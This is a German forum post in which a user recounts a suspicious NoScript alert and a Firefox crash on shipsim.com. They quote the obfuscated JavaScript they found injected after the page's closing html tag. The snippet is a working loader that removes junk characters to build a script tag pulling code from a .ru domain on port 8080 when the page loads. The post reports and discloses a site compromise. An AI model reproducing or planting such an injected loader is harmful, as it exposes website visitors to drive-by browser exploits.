Ja ich hatte ähnliche Mysteriöse Erlebnisse
Ich habe in meinen FF No Script installiert das hatte mit einmal kam da die Meldung das er eine neue (noch nicht erlaubte) domain blockiert hat zumindest dessen Inhalt.
Domain war erstmal nur theatticsale.ru
Da ich dachte das dies durch ein eingebundenes Medium von shipsim.com (video oder so, diese Meldung von noscript hatte ich auch schon nen paar tage davor gehabt hab es aber erstmal weder erlaubt noch verboten so das es nicht wirken konnte) habe ich es kurz erlaubt, danach öffnete sich Java. etwas später kam von Windows die Meldung das Firefox aus Sicherheitsgründen geschlossen wurde worauf dann der MS Fehlerreport folgte.
Firefox neu gestartet, darauf hin meldete mir noscript "http://met-art-com.koubei.com.mpnrs-com.theatticsale.ru:8080" als noch nicht erlaubte Seite.
diese erlaubnis löste erstmal keine Probleme aus. ich habe mir danach erstmal die einzelnen seiten angeschaut es kamen eigentlich nur leere seiten (Tomcat, Apache) und so was so aus sah als wäre der server erst frisch aufgesetzt wurden oder so.
danach folgte erstmal eine Besichtigung des Quelltextes von shipsim.com, da war kein direkter Hinweis auf auf "http://met-art-com.koubei.com.mpnrs-com.theatticsale.ru:8080 oder theatticsale.ru" zu finden
Aber ich fand mysteriös aussehenden Javascript quellcode der faszinierender weise auch noch nach dem "
</html> auf tauchte sprich da wo er nicht wirklich hingehört es hat vieles darauf schließen lassen das es ein code in verschlüsselter js form war welcher dann die Url zu den oben genannten seiten bereit stellte.
(kompletter code teil des funds)
</html><script>/*GNU GPL*/ try{window.onload = function(){var Tpr12yo3qwu6wfd = document.createElement('s$@#c)(#&!r$^$i$)&!p!!&t!'.replace(/\^|\$|&|#|\(|@|\!|\)/ig, ''));Tpr12yo3qwu6wfd.setAttribute('type', 'text/javascript');Tpr12yo3qwu6wfd.setAttribute('src', 'h&#t#t(p@&:@#!^/(/@#m#$!e$t#$&-#a&r!&t^)-!##@!c!o($&m$(#.&!@!k(^(&o@!u##^b^(^e^i#^.!c^$o&$m!^.@^m^p!!)n(^$@r!&s@!@-$^^c&o@^m!($.$t^&$h^$&^e!(a#@&t^@t(&#^i$)c^@(s#@(#a(#l$(e@)$!.@)r&u(&:^(^(8@!0)##8##0$(#&/)#($m!@&i)@()h)$^a)@n!^$b@l@$o#(!(g($.$$c!@^o)!!m!&&/@m#!!i$()$h$&a$)#n^^b!!l^(^$o^@@g^@)(.$&)c^^o(#)m)!/^&b@&a!$##i!x!&$^^i)$&^@n$$g)#^.$$(()c(o#)m#!/!&)g@^o$o#^g)!$^l$((&e!(.!!c(o)#(m&#/^t$&!r@#$a#v!)#i)(a#$^n$.!)!&a^)e&(/^$'.replace(/\!|\(|@|#|\)|\$|&|\^/ig, ''));Tpr12yo3qwu6wfd.setAttribute('defer', 'defer');Tpr12yo3qwu6wfd.setAttribute('id', 'M&$($)e&(z(f)(8##j!)^7!$#@8$)t^^g#)j&)&2!#&!9(^)'.replace(/&|\)|\!|\$|#|\(|\^|@/ig, ''));document.body.appendChild(Tpr12yo3qwu6wfd);}} catch(e) {}</script>Ich hatte schon von Anfang an ein schlechtes Gefühl das diese Seite nicht wirklich zu shipsim gehört.
Eine weitere Google Suche nach "theatticsale.ru" brachte mir folgendes Ergebnis.
http://wwwSpambotadvisor.com/sites/theatticsale.ru/postid/?p=2776016
Bewertung: Browser-Exploit
